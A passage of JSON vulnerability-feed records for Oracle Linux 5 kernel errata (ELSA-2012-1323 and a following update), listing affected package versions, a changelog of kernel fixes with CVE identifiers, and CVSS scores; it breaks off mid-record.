"kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5xen-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5debug-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5xen-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5debug-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.el5xen-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5debug-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.el5debug-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.el5debug-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.el5PAE-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.el5xen-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.el5PAE-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.el5xen-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.el5", "operator": "lt"}], "description": "kernel\n[2.6.18-308.16.1.el5]\n- Revert: [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- Revert: [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- Revert: [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- Revert: [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- Revert: [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- Revert: [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n[2.6.18-308.15.1.el5]\n- [net] sfc: Fix max no of TSO segments and min TX queue size (Michal Schmidt) [845554 845555] {CVE-2012-3412}\n- [kernel] xacct_add_tsk: fix pure theoretical ->mm use-after-free (Nikola Pajkovsky) [849723 849725] {CVE-2012-3510}\n- [fs] hfsplus: Buffer overflow in the HFS plus filesystem (Jacob Tanenbaum) [820255 820256] {CVE-2012-2319}\n- [net] netfilter: add dscp netfilter match (Thomas Graf) [847327 842029]\n- [net] rds: set correct msg_namelen (Weiping Pan) [822727 822728] {CVE-2012-3430}\n- [misc] ERESTARTNOINTR seen from fork call in userspace (Oleg Nesterov) [847359 693822]\n- [fs] quota: manage reserved space when quota is not active (Eric Sandeen) [847326 818087]\n- [fs] quota: Fix warning if delayed write before quota is enabled (Eric Sandeen) [847326 818087]\n- [fs] ext3: pass custom EOF to generic_file_llseek_size() (Eric Sandeen) [847943 784191]\n- [fs] ext4: use core vfs llseek code for dir seeks (Eric Sandeen) [847943 784191]\n- [fs] vfs: allow custom EOF in generic_file_llseek code (Eric Sandeen) [847943 784191]\n- [fs] ext4: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [fs] ext4: improve llseek error handling for large seek offsets (Eric Sandeen) [847943 784191]\n- [fs] ext3: return 32/64-bit dir name hash according to usage type (Eric Sandeen) [847943 784191]\n- [s390/ppc64] add is_compat_task() for s390 and ppc64 (Eric Sandeen) [847943 784191]\n- [fs] vfs: add generic_file_llseek_size (Eric Sandeen) [847943 784191]\n- [fs] nfsd: vfs_llseek() with 32 or 64 bit offsets (hashes) (Eric Sandeen) [847943 784191]\n- [fs] nfsd: rename int access to int may_flags in nfsd_open() (Eric Sandeen) [847943 784191]\n- [fs] add new FMODE flags: FMODE_32bithash and FMODE_64bithash (Eric Sandeen) [847943 784191]\n- [fs] nfsd4: Remove check for a 32-bit cookie in nfsd4_readdir() (Eric Sandeen) [847943 784191]\n- [xen] x86: whitelist Enhanced SpeedStep for dom0 (Laszlo Ersek) [846125 809103]\n[2.6.18-308.14.1.el5]\n- [net] e1000e: drop check of RXCW.CW to eliminate link up and down (Dean Nelson) [852448 840642]", "edition": 3, "reporter": "Oracle", "published": "2012-10-02T00:00:00", "title": "kernel security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2319", "CVE-2012-3510", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2012-10-02T00:00:00", "id": "ELSA-2012-1323", "href": "http://linux.oracle.com/errata/ELSA-2012-1323.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:45:16", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5xen-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5debug-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-308.16.1.0.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5PAE-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5debug-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5debug-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5debug-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5debug-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5PAE-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5xen-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5xen-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.0.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5xen-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5debug-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5xen-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5xen-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.10-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-308.16.1.0.1.el5-1.4.10-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.0.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-308.16.1.0.1.el5-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-308.16.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.0.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}], "description": "kernel\n[2.6.18-308.16.1.0.1.el5]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 